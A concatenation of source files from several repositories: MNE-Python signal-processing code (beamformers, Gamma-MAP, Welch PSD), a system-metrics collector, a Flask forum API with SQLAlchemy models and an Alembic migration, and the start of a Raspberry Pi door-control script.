# Compute the direction of max power
u, s, _ = np.linalg.svd(power.real)
max_ori = u[:, 0]
Wk[:] = np.dot(max_ori, Wk)
else: # do vector beamformer
if method == 'lcmv':
# compute the filters:
if is_free_ori:
# Free source orientation
Wk[:] = np.dot(linalg.pinv(Ck, 0.1), Wk)
else:
# Fixed source orientation
if not np.all(Ck == 0.):
Wk /= Ck
# handle noise normalization with free/normal source
# orientation:
if weight_norm == 'nai':
raise NotImplementedError('Weight normalization with '
'neural activity index is not '
'implemented yet with free or '
'fixed orientation.')
elif weight_norm == 'unit-noise-gain':
noise_norm = np.sum(Wk ** 2, axis=1, keepdims=True)
if is_free_ori and pick_ori in [None, 'vector']:
# Only do this when we don't select a single
# orientation later. We need to enforce:
# W @ I @ W.T == I
noise_norm = np.sum(noise_norm)
noise_norm = np.sqrt(noise_norm)
if np.all(noise_norm == 0.):
noise_norm_inv = 0. # avoid division by 0
else:
noise_norm_inv = 1. / noise_norm
Wk[:] *= noise_norm_inv
# picking source orientation maximizing output source power
if pick_ori == 'max-power':
W = W[0::3]
elif pick_ori == 'normal':
W = W[2::3]
is_free_ori = False
if method == 'dics':
if weight_norm == 'unit-noise-gain':
# Scale weights so that W @ I @ W.T == I
if pick_ori is None and n_orient > 1:
# Compute the norm for each set of 3 dipoles
W = W.reshape(-1, 3, W.shape[1])
norm = np.sqrt(np.sum(W ** 2, axis=(1, 2)))
W /= norm[:, np.newaxis, np.newaxis]
W = W.reshape(-1, W.shape[2])
else:
# Compute the norm for each dipole
norm = np.sqrt(np.sum(W ** 2, axis=1))
W /= norm[:, np.newaxis]
return W, is_free_ori
class Beamformer(dict):
"""A computed beamformer.
Notes
-----
.. versionadded:: 0.17
"""
def copy(self):
"""Copy the beamformer.
Returns
-------
beamformer : instance of Beamformer
A deep copy of the beamformer.
"""
return deepcopy(self)
def __repr__(self): # noqa: D105
n_verts = sum(len(v) for v in self['vertices'])
n_channels = len(self['ch_names'])
if self['subject'] is None:
subject = 'unknown'
else:
subject = '"%s"' % (self['subject'],)
out = ('<Beamformer | %s, subject %s, %s vert, %s ch'
% (self['kind'], subject, n_verts, n_channels))
if self['pick_ori'] is not None:
out += ', %s ori' % (self['pick_ori'],)
if self['weight_norm'] is not None:
out += ', %s norm' % (self['weight_norm'],)
if self.get('inversion') is not None:
out += ', %s inversion' % (self['inversion'],)
if 'rank' in self:
out += ', rank %s' % (self['rank'],)
out += '>'
return out
@verbose
def save(self, fname, overwrite=False, verbose=None):
"""Save the beamformer filter.
Parameters
----------
fname : str
The filename to use to write the HDF5 data.
Should end in ``'-lcmv.h5'`` or ``'-dics.h5'``.
overwrite : bool
If True, overwrite the file (if it exists).
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
ending = '-%s.h5' % (self['kind'].lower(),)
check_fname(fname, self['kind'], (ending,))
csd_orig = None
try:
if 'csd' in self:
csd_orig = self['csd']
self['csd'] = self['csd'].__getstate__()
write_hdf5(fname, self, overwrite=overwrite, title='mnepython')
finally:
if csd_orig is not None:
self['csd'] = csd_orig
def read_beamformer(fname):
"""Read a beamformer filter.
Parameters
----------
fname : str
The filename of the HDF5 file.
Returns
-------
filter : instance of Beamformer
The beamformer filter.
"""
beamformer = read_hdf5(fname, title='mnepython')
if 'csd' in beamformer:
beamformer['csd'] = CrossSpectralDensity(**beamformer['csd'])
# h5io seems to cast `bool` to `int` on round-trip, probably a bug
# we should fix at some point (if possible -- could be HDF5 limitation)
for key in ('normalize_fwd', 'is_free_ori', 'is_ssp'):
if key in beamformer:
beamformer[key] = bool(beamformer[key])
for key in ('data_cov', 'noise_cov'):
if beamformer.get(key) is not None:
for pi, p in enumerate(beamformer[key]['projs']):
p = Projection(**p)
p['active'] = bool(p['active'])
beamformer[key]['projs'][pi] = p
beamformer[key] = Covariance(
*[beamformer[key].get(arg)
for arg in ('data', 'names', 'bads', 'projs', 'nfree', 'eig',
'eigvec', 'method', 'loglik')])
return Beamformer(beamformer)
```
#### File: mne/inverse_sparse/_gamma_map.py
```python
import numpy as np
from scipy import linalg
from ..forward import is_fixed_orient, convert_forward_solution
from ..minimum_norm.inverse import _check_reference
from ..utils import logger, verbose, warn
from ..externals.six.moves import xrange as range
from .mxne_inverse import (_make_sparse_stc, _prepare_gain,
_reapply_source_weighting, _compute_residual,
_make_dipoles_sparse, _check_loose_forward)
@verbose
def _gamma_map_opt(M, G, alpha, maxit=10000, tol=1e-6, update_mode=1,
group_size=1, gammas=None, verbose=None):
"""Hierarchical Bayes (Gamma-MAP).
Parameters
----------
M : array, shape=(n_sensors, n_times)
Observation.
G : array, shape=(n_sensors, n_sources)
Forward operator.
alpha : float
Regularization parameter (noise variance).
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter for convergence.
group_size : int
Number of consecutive sources which use the same gamma.
update_mode : int
Update mode, 1: MacKay update (default), 3: Modified MacKay update.
gammas : array, shape=(n_sources,)
Initial values for posterior variances (gammas). If None, a
variance of 1.0 is used.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
X : array, shape=(n_active, n_times)
Estimated source time courses.
active_set : array, shape=(n_active,)
Indices of active sources.
"""
G = G.copy()
M = M.copy()
if gammas is None:
gammas = np.ones(G.shape[1], dtype=np.float)
eps = np.finfo(float).eps
n_sources = G.shape[1]
n_sensors, n_times = M.shape
# apply normalization so the numerical values are sane
M_normalize_constant = linalg.norm(np.dot(M, M.T), ord='fro')
M /= np.sqrt(M_normalize_constant)
alpha /= M_normalize_constant
G_normalize_constant = linalg.norm(G, ord=np.inf)
G /= G_normalize_constant
if n_sources % group_size != 0:
raise ValueError('Number of sources has to be evenly dividable by the '
'group size')
n_active = n_sources
active_set = np.arange(n_sources)
gammas_full_old = gammas.copy()
if update_mode == 2:
denom_fun = np.sqrt
else:
# do nothing
def denom_fun(x):
return x
last_size = -1
for itno in range(maxit):
gammas[np.isnan(gammas)] = 0.0
gidx = (np.abs(gammas) > eps)
active_set = active_set[gidx]
gammas = gammas[gidx]
# update only active gammas (once set to zero it stays at zero)
if n_active > len(active_set):
n_active = active_set.size
G = G[:, gidx]
CM = np.dot(G * gammas[np.newaxis, :], G.T)
CM.flat[::n_sensors + 1] += alpha
# Invert CM keeping symmetry
U, S, V = linalg.svd(CM, full_matrices=False)
S = S[np.newaxis, :]
CM = np.dot(U * S, U.T)
CMinv = np.dot(U / (S + eps), U.T)
CMinvG = np.dot(CMinv, G)
A = np.dot(CMinvG.T, M) # mult. w. Diag(gamma) in gamma update
if update_mode == 1:
# MacKay fixed point update (10) in [1]
numer = gammas ** 2 * np.mean((A * A.conj()).real, axis=1)
denom = gammas * np.sum(G * CMinvG, axis=0)
elif update_mode == 2:
# modified MacKay fixed point update (11) in [1]
numer = gammas * np.sqrt(np.mean((A * A.conj()).real, axis=1))
denom = np.sum(G * CMinvG, axis=0) # sqrt is applied below
else:
raise ValueError('Invalid value for update_mode')
if group_size == 1:
if denom is None:
gammas = numer
else:
gammas = numer / np.maximum(denom_fun(denom),
np.finfo('float').eps)
else:
numer_comb = np.sum(numer.reshape(-1, group_size), axis=1)
if denom is None:
gammas_comb = numer_comb
else:
denom_comb = np.sum(denom.reshape(-1, group_size), axis=1)
gammas_comb = numer_comb / denom_fun(denom_comb)
gammas = np.repeat(gammas_comb / group_size, group_size)
# compute convergence criterion
gammas_full = np.zeros(n_sources, dtype=np.float)
gammas_full[active_set] = gammas
err = (np.sum(np.abs(gammas_full - gammas_full_old)) /
np.sum(np.abs(gammas_full_old)))
gammas_full_old = gammas_full
breaking = (err < tol or n_active == 0)
if len(gammas) != last_size or breaking:
logger.info('Iteration: %d\t active set size: %d\t convergence: '
'%0.3e' % (itno, len(gammas), err))
last_size = len(gammas)
if breaking:
break
if itno < maxit - 1:
logger.info('\nConvergence reached !\n')
else:
warn('\nConvergence NOT reached !\n')
# undo normalization and compute final posterior mean
n_const = np.sqrt(M_normalize_constant) / G_normalize_constant
x_active = n_const * gammas[:, None] * A
return x_active, active_set
@verbose
def gamma_map(evoked, forward, noise_cov, alpha, loose="auto", depth=0.8,
xyz_same_gamma=True, maxit=10000, tol=1e-6, update_mode=1,
gammas=None, pca=True, return_residual=False,
return_as_dipoles=False, verbose=None):
"""Hierarchical Bayes (Gamma-MAP) sparse source localization method.
Models each source time course using a zero-mean Gaussian prior with an
unknown variance (gamma) parameter. During estimation, most gammas are
driven to zero, resulting in a sparse source estimate, as in
[1]_ and [2]_.
For fixed-orientation forward operators, a separate gamma is used for each
source time course, while for free-orientation forward operators, the same
gamma is used for the three source time courses at each source space point
(separate gammas can be used in this case by using xyz_same_gamma=False).
Parameters
----------
evoked : instance of Evoked
Evoked data to invert.
forward : dict
Forward operator.
noise_cov : instance of Covariance
Noise covariance to compute whitener.
alpha : float
Regularization parameter (noise variance).
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
depth: None | float in [0, 1]
Depth weighting coefficients. If None, no depth weighting is performed.
xyz_same_gamma : bool
Use same gamma for xyz current components at each source space point.
Recommended for free-orientation forward solutions.
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter for convergence.
update_mode : int
Update mode, 1: MacKay update (default), 2: Modified MacKay update.
gammas : array, shape=(n_sources,)
Initial values for posterior variances (gammas). If None, a
variance of 1.0 is used.
pca : bool
If True the rank of the data is reduced to the true dimension.
return_residual : bool
If True, the residual is returned as an Evoked instance.
return_as_dipoles : bool
If True, the sources are returned as a list of Dipole instances.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
stc : instance of SourceEstimate
Source time courses.
residual : instance of Evoked
The residual a.k.a. data not explained by the sources.
Only returned if return_residual is True.
References
----------
.. [1] Wipf et al. Analysis of Empirical Bayesian Methods for
Neuroelectromagnetic Source Localization, Advances in Neural
Information Process. Systems (2007)
.. [2] <NAME>, <NAME>
"A unified Bayesian framework for MEG/EEG source imaging",
Neuroimage, Volume 44, Number 3, pp. 947-966, Feb. 2009.
DOI: 10.1016/j.neuroimage.2008.02.059
"""
_check_reference(evoked)
loose, forward = _check_loose_forward(loose, forward)
# make forward solution in fixed orientation if necessary
if loose == 0. and not is_fixed_orient(forward):
forward = convert_forward_solution(
forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)
if is_fixed_orient(forward) or not xyz_same_gamma:
group_size = 1
else:
group_size = 3
gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked.info, noise_cov, pca, depth, loose, None, None)
# get the data
sel = [evoked.ch_names.index(name) for name in gain_info['ch_names']]
M = evoked.data[sel]
# whiten the data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
# run the optimization
X, active_set = _gamma_map_opt(M, gain, alpha, maxit=maxit, tol=tol,
update_mode=update_mode, gammas=gammas,
group_size=group_size, verbose=verbose)
if len(active_set) == 0:
raise Exception("No active dipoles found. alpha is too big.")
# Compute estimated whitened sensor data
M_estimated = np.dot(gain[:, active_set], X)
# Reapply weights to have correct unit
X = _reapply_source_weighting(X, source_weighting, active_set)
if return_residual:
residual = _compute_residual(forward, evoked, X, active_set,
gain_info)
if group_size == 1 and not is_fixed_orient(forward):
# make sure each source has 3 components
active_src = np.unique(active_set // 3)
in_pos = 0
if len(X) < 3 * len(active_src):
X_xyz = np.zeros((3 * len(active_src), X.shape[1]), dtype=X.dtype)
for ii in range(len(active_src)):
for jj in range(3):
if in_pos >= len(active_set):
break
if (active_set[in_pos] + jj) % 3 == 0:
X_xyz[3 * ii + jj] = X[in_pos]
in_pos += 1
X = X_xyz
tmin = evoked.times[0]
tstep = 1.0 / evoked.info['sfreq']
if return_as_dipoles:
out = _make_dipoles_sparse(X, active_set, forward, tmin, tstep, M,
M_estimated, active_is_idx=True)
else:
out = _make_sparse_stc(X, active_set, forward, tmin, tstep,
active_is_idx=True, verbose=verbose)
logger.info('[done]')
if return_residual:
out = out, residual
return out
```
#### File: kit/tests/test_coreg.py
```python
import inspect
import os
from mne.externals.six.moves import cPickle as pickle
import pytest
from numpy.testing import assert_array_equal
from mne.io.kit import read_mrk
from mne.io.meas_info import _write_dig_points
from mne.utils import _TempDir
FILE = inspect.getfile(inspect.currentframe())
parent_dir = os.path.dirname(os.path.abspath(FILE))
data_dir = os.path.join(parent_dir, 'data')
mrk_fname = os.path.join(data_dir, 'test_mrk.sqd')
def test_io_mrk():
"""Test IO for mrk files."""
tempdir = _TempDir()
pts = read_mrk(mrk_fname)
# txt
path = os.path.join(tempdir, 'mrk.txt')
_write_dig_points(path, pts)
pts_2 = read_mrk(path)
assert_array_equal(pts, pts_2, "read/write mrk to text")
# pickle
fname = os.path.join(tempdir, 'mrk.pickled')
with open(fname, 'wb') as fid:
pickle.dump(dict(mrk=pts), fid)
pts_2 = read_mrk(fname)
assert_array_equal(pts_2, pts, "pickle mrk")
with open(fname, 'wb') as fid:
pickle.dump(dict(), fid)
pytest.raises(ValueError, read_mrk, fname)
# unsupported extension
pytest.raises(ValueError, read_mrk, "file.ext")
```
#### File: mne/time_frequency/psd.py
```python
import numpy as np
from ..parallel import parallel_func
from ..io.pick import _pick_data_channels
from ..utils import logger, verbose, _time_mask
from ..fixes import get_spectrogram
from .multitaper import psd_array_multitaper
def _psd_func(epoch, noverlap, n_per_seg, nfft, fs, freq_mask, func):
"""Aux function."""
return func(epoch, fs=fs, nperseg=n_per_seg, noverlap=noverlap,
nfft=nfft, window='hamming')[2][..., freq_mask, :]
def _check_nfft(n, n_fft, n_per_seg, n_overlap):
"""Ensure n_fft, n_per_seg and n_overlap make sense."""
if n_per_seg is None and n_fft > n:
raise ValueError(('If n_per_seg is None n_fft is not allowed to be > '
'n_times. If you want zero-padding, you have to set '
'n_per_seg to relevant length. Got n_fft of %d while'
' signal length is %d.') % (n_fft, n))
n_per_seg = n_fft if n_per_seg is None or n_per_seg > n_fft else n_per_seg
n_per_seg = n if n_per_seg > n else n_per_seg
if n_overlap >= n_per_seg:
raise ValueError(('n_overlap cannot be greater than n_per_seg (or '
'n_fft). Got n_overlap of %d while n_per_seg is '
'%d.') % (n_overlap, n_per_seg))
return n_fft, n_per_seg, n_overlap
def _check_psd_data(inst, tmin, tmax, picks, proj, reject_by_annotation=False):
"""Check PSD data / pull arrays from inst."""
from ..io.base import BaseRaw
from ..epochs import BaseEpochs
from ..evoked import Evoked
if not isinstance(inst, (BaseEpochs, BaseRaw, Evoked)):
raise ValueError('epochs must be an instance of Epochs, Raw, or'
'Evoked. Got type {0}'.format(type(inst)))
time_mask = _time_mask(inst.times, tmin, tmax, sfreq=inst.info['sfreq'])
if picks is None:
picks = _pick_data_channels(inst.info, with_ref_meg=False)
if proj:
# Copy first so it's not modified
inst = inst.copy().apply_proj()
sfreq = inst.info['sfreq']
if isinstance(inst, BaseRaw):
start, stop = np.where(time_mask)[0][[0, -1]]
rba = 'NaN' if reject_by_annotation else None
data = inst.get_data(picks, start, stop + 1, reject_by_annotation=rba)
elif isinstance(inst, BaseEpochs):
data = inst.get_data()[:, picks][:, :, time_mask]
else: # Evoked
data = inst.data[picks][:, time_mask]
return data, sfreq
@verbose
def psd_array_welch(x, sfreq, fmin=0, fmax=np.inf, n_fft=256, n_overlap=0,
n_per_seg=None, n_jobs=1, verbose=None):
"""Compute power spectral density (PSD) using Welch's method.
Parameters
----------
x : array, shape=(..., n_times)
The data to compute PSD from.
sfreq : float
The sampling frequency.
fmin : float
The lower frequency of interest.
fmax : float
The upper frequency of interest.
n_fft : int
The length of FFT used, must be ``>= n_per_seg`` (default: 256).
The segments will be zero-padded if ``n_fft > n_per_seg``.
n_overlap : int
The number of points of overlap between segments. Will be adjusted
to be <= n_per_seg. The default value is 0.
n_per_seg : int | None
Length of each Welch segment (windowed with a Hamming window). Defaults
to None, which sets n_per_seg equal to n_fft.
n_jobs : int
Number of CPUs to use in the computation.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
psds : ndarray, shape (..., n_freqs) or
The power spectral densities. All dimensions up to the last will
be the same as input.
freqs : ndarray, shape (n_freqs,)
The frequencies.
Notes
-----
.. versionadded:: 0.14.0
"""
spectrogram = get_spectrogram()
dshape = x.shape[:-1]
n_times = x.shape[-1]
x = x.reshape(-1, n_times)
# Prep the PSD
n_fft, n_per_seg, n_overlap = _check_nfft(n_times, n_fft, n_per_seg,
n_overlap)
win_size = n_fft / float(sfreq)
logger.info("Effective window size : %0.3f (s)" % win_size)
freqs = np.arange(n_fft // 2 + 1, dtype=float) * (sfreq / n_fft)
freq_mask = (freqs >= fmin) & (freqs <= fmax)
freqs = freqs[freq_mask]
# Parallelize across first N-1 dimensions
parallel, my_psd_func, n_jobs = parallel_func(_psd_func, n_jobs=n_jobs)
x_splits = np.array_split(x, n_jobs)
f_spectrogram = parallel(my_psd_func(d, noverlap=n_overlap, nfft=n_fft,
fs=sfreq, freq_mask=freq_mask,
func=spectrogram, n_per_seg=n_per_seg)
for d in x_splits)
# Combining, reducing windows and reshaping to original data shape
psds = np.concatenate([np.nanmean(f_s, axis=-1)
for f_s in f_spectrogram], axis=0)
psds.shape = dshape + (-1,)
return psds, freqs
@verbose
def psd_welch(inst, fmin=0, fmax=np.inf, tmin=None, tmax=None, n_fft=256,
n_overlap=0, n_per_seg=None, picks=None, proj=False, n_jobs=1,
reject_by_annotation=True, verbose=None):
"""Compute the power spectral density (PSD) using Welch's method.
Calculates periodograms for a sliding window over the time dimension, then
averages them together for each channel/epoch.
Parameters
----------
inst : instance of Epochs or Raw or Evoked
The data for PSD calculation
fmin : float
Min frequency of interest
fmax : float
Max frequency of interest
tmin : float | None
Min time of interest
tmax : float | None
Max time of interest
n_fft : int
The length of FFT used, must be ``>= n_per_seg`` (default: 256).
The segments will be zero-padded if ``n_fft > n_per_seg``.
If n_per_seg is None, n_fft must be >= number of time points
in the data.
n_overlap : int
The number of points of overlap between segments. Will be adjusted
to be <= n_per_seg. The default value is 0.
n_per_seg : int | None
Length of each Welch segment (windowed with a Hamming window). Defaults
to None, which sets n_per_seg equal to n_fft.
picks : array-like of int | None
The selection of channels to include in the computation.
If None, take all channels.
proj : bool
Apply SSP projection vectors. If inst is ndarray this is not used.
n_jobs : int
Number of CPUs to use in the computation.
reject_by_annotation : bool
Whether to omit bad segments from the data while computing the
PSD. If True, annotated segments with a description that starts
with 'bad' are omitted. Has no effect if ``inst`` is an Epochs or
Evoked object. Defaults to True.
.. versionadded:: 0.15.0
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
psds : ndarray, shape (..., n_freqs)
The power spectral densities. If input is of type Raw,
then psds will be shape (n_channels, n_freqs), if input is type Epochs
then psds will be shape (n_epochs, n_channels, n_freqs).
freqs : ndarray, shape (n_freqs,)
The frequencies.
See Also
--------
mne.io.Raw.plot_psd
mne.Epochs.plot_psd
psd_multitaper
psd_array_welch
Notes
-----
.. versionadded:: 0.12.0
"""
# Prep data
data, sfreq = _check_psd_data(inst, tmin, tmax, picks, proj,
reject_by_annotation=reject_by_annotation)
return psd_array_welch(data, sfreq, fmin=fmin, fmax=fmax, n_fft=n_fft,
n_overlap=n_overlap, n_per_seg=n_per_seg,
n_jobs=n_jobs, verbose=verbose)
@verbose
def psd_multitaper(inst, fmin=0, fmax=np.inf, tmin=None, tmax=None,
bandwidth=None, adaptive=False, low_bias=True,
normalization='length', picks=None, proj=False,
n_jobs=1, verbose=None):
"""Compute the power spectral density (PSD) using multitapers.
Calculates spectral density for orthogonal tapers, then averages them
together for each channel/epoch. See [1] for a description of the tapers
and [2] for the general method.
Parameters
----------
inst : instance of Epochs or Raw or Evoked
The data for PSD calculation.
fmin : float
Min frequency of interest
fmax : float
Max frequency of interest
tmin : float | None
Min time of interest
tmax : float | None
Max time of interest
bandwidth : float
The bandwidth of the multi taper windowing function in Hz. The default
value is a window half-bandwidth of 4.
adaptive : bool
Use adaptive weights to combine the tapered spectra into PSD
(slow, use n_jobs >> 1 to speed up computation).
low_bias : bool
Only use tapers with more than 90% spectral concentration within
bandwidth.
normalization : str
Either "full" or "length" (default). If "full", the PSD will
be normalized by the sampling rate as well as the length of
the signal (as in nitime).
picks : array-like of int | None
The selection of channels to include in the computation.
If None, take all channels.
proj : bool
Apply SSP projection vectors. If inst is ndarray this is not used.
n_jobs : int
Number of CPUs to use in the computation.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
psds : ndarray, shape (..., n_freqs)
The power spectral densities. If input is of type Raw,
then psds will be shape (n_channels, n_freqs), if input is type Epochs
then psds will be shape (n_epochs, n_channels, n_freqs).
freqs : ndarray, shape (n_freqs,)
The frequencies.
References
----------
.. [1] <NAME>. "Prolate spheroidal wave functions, Fourier analysis,
and uncertainty V: The discrete case." Bell System Technical
Journal, vol. 57, 1978.
.. [2] <NAME>. and <NAME>. "Spectral Analysis for Physical
Applications: Multitaper and Conventional Univariate Techniques."
Cambridge University Press, 1993.
See Also
--------
mne.io.Raw.plot_psd
mne.Epochs.plot_psd
psd_array_multitaper
psd_welch
csd_multitaper
Notes
-----
.. versionadded:: 0.12.0
"""
# Prep data
data, sfreq = _check_psd_data(inst, tmin, tmax, picks, proj)
return psd_array_multitaper(data, sfreq, fmin=fmin, fmax=fmax,
bandwidth=bandwidth, adaptive=adaptive,
low_bias=low_bias, normalization=normalization,
n_jobs=n_jobs, verbose=verbose)
``` |
{
"source": "jnvilo/sensesagent",
"score": 2
} |
#### File: sensesagent/collectors/LoadAverageCollector.py
```python
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from future.utils import raise_
from future.utils import raise_with_traceback
from future.utils import raise_from
from future.utils import iteritems
import os
import logging
import psutil
from multiprocessing import cpu_count
from sensesagent.collectors.collector import Collector
class LoadAverageCollector(Collector):
"""
Collects Load average. This collector exposes the following metrics:
load_1_minute - The 1 minute load average
load_5_minute - The 5 minute load average
load_15_minute - The 15 minute load average
"""
def collect_metrics(self):
"""Implements gathering the metrics and filling up our
metrics object
"""
load_1_minute, load_5_minute, load_15_minute = os.getloadavg()
cpu_percent = psutil.cpu_percent()
self.add_metric("load_1_minute", load_1_minute)
self.add_metric("load_5_minute", load_5_minute)
self.add_metric("load_15_minute", load_15_minute)
if __name__ == "__main__":
lac = LoadAverageCollector()
for key in lac.metrics.keys():
print(key)
```
#### File: sensesagent/tests/SystemStatsCollector_tests.py
```python
import unittest
import os
import simplejson as json
from pathlib import Path
from sensesagent.collectors.loadaverage import SystemStatsCollector
from sensesagent import log
class SystemStatsCollector(unittest.TestCase):
def setUp(self):
#The config path is one directory above us.
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_path = Path(dir_path).parent
template_path = Path(parent_path, "conf/collector_templates/LoadAverageCollector.template")
self.lac = SystemStatsCollector(template_path=template_path.as_posix())
def test_can_process_template(self):
json_str = self.lac.process_template()
print(json_str)
def test_metric(self):
pass
def test_json(self):
x = json.loads(self.lac.json)
print(x)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jnwanya/online-forum-flask-api",
"score": 2
} |
#### File: app/main/__init__.py
```python
from flask import Flask
from flask_bcrypt import Bcrypt
from flask_sqlalchemy import SQLAlchemy
from flask_jwt_extended import JWTManager
from .config import config_by_name
db = SQLAlchemy()
bcrypt = Bcrypt()
jwt = JWTManager()
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config_by_name[config_name])
jwt.init_app(app)
db.init_app(app)
bcrypt.init_app(app)
return app
```
#### File: main/model/post.py
```python
from .audit_base import AuditModel
from .post_category import PostCategory
from .user import User
from .. import db
class Post(db.Model, AuditModel):
__tablename__ = 'post'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(255), nullable=False)
content = db.Column(db.Text, nullable=False)
view_count = db.Column(db.Integer, default=0)
category_id = db.Column(db.Integer, db.ForeignKey('post_category.id'), nullable=False)
category = db.relationship('PostCategory')
creator_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
creator = db.relationship('User')
def __init__(self, title: str, content: str, category: PostCategory, creator: User):
self.title = title
self.content = content
self.category = category
self.creator = creator
def __repr__(self):
return f"<Post({self.id}, {self.title})>"
def save(self):
db.session.add(self)
db.session.commit()
@classmethod
def find_title_and_category(cls, title: str, category: PostCategory) -> 'Post':
return Post.query.filter(Post.title.ilike(title), Post.category.id == category.id).first()
```
#### File: main/service/bootloader.py
```python
from ..model.role import Role, RoleConstant
from ..model.post_category import PostCategory
class BootLoader:
__category_list = [
{'name': 'General', 'description': 'For all general posting'},
{'name': 'Politics', 'description': 'For issues and discussion related to politics'},
{'name': 'Career', 'description': 'For description about careers and job opportunities'},
{'name': 'Entertainers', 'description': 'For funny and entertaining post. be it music, jokes, comedy'},
]
@classmethod
def __create_roles(cls):
role_list = [name for name in dir(RoleConstant) if not name.startswith('_')]
for role_name in role_list:
if not Role.find_by_name(role_name):
role = Role(role_name)
role.save()
@classmethod
def __create_post_categories(cls):
for category in cls.__category_list:
print(category)
if not PostCategory.find_by_name(category['name']):
post_category = PostCategory(**category)
post_category.save()
@classmethod
def setup_app_data(cls):
cls.__create_roles()
cls.__create_post_categories()
```
#### File: migrations/versions/7a61c334127c_added_post_view_model.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '7a61c334127c'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('post_category',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('name', sa.String(length=150), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('status', sa.String(length=25), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('post',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('title', sa.String(length=255), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('view_count', sa.Integer(), nullable=True),
sa.Column('category_id', sa.Integer(), nullable=False),
sa.Column('creator_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['category_id'], ['post_category.id'], ),
sa.ForeignKeyConstraint(['creator_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('comment',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('status', sa.String(length=25), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('post_id', sa.Integer(), nullable=False),
sa.Column('posted_by_id', sa.Integer(), nullable=False),
sa.Column('replied_comment_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.ForeignKeyConstraint(['posted_by_id'], ['user.id'], ),
sa.ForeignKeyConstraint(['replied_comment_id'], ['comment.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post_like',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('status', sa.String(length=25), nullable=False),
sa.Column('post_id', sa.Integer(), nullable=False),
sa.Column('like_by_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['like_by_id'], ['user.id'], ),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('topic_view',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('status', sa.String(length=25), nullable=False),
sa.Column('viewer_ip_address', sa.String(length=30), nullable=False),
sa.Column('topic_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['topic_id'], ['post.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.drop_table('topic_category')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('topic_category',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('name', sa.VARCHAR(length=150), autoincrement=False, nullable=False),
sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True),
sa.Column('status', sa.VARCHAR(length=25), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint('id', name='topic_category_pkey'),
sa.UniqueConstraint('name', name='topic_category_name_key')
)
op.drop_table('topic_view')
op.drop_table('post_like')
op.drop_table('comment')
op.drop_table('post')
op.drop_table('post_category')
# ### end Alembic commands ###
``` |
{
"source": "jnwanya/python-basic-lesson",
"score": 4
} |
#### File: jnwanya/python-basic-lesson/variables_methods.py
```python
a = 5
b = 10
my_variable = 10
string_variable = "Hello world"
# print(string_variable)
def my_printer(param):
print(param)
def multiply_value(number_one, number_two):
return number_one * number_two
result = multiply_value(3, 5)
my_printer(result)
``` |
{
"source": "jnwarp/pi-lights",
"score": 3
} |
#### File: pi-lights/src/door.py
```python
import pigpio
import time
# set pins
default_pins = {
'motion': 3, #read data
'motion_led': 4, #output high
'door_in': 20, #read data
'door_out': 21, #output high power
}
class DoorControl():
def __init__(self, pins = default_pins):
# initialize pigpio
self.pi = pigpio.pi()
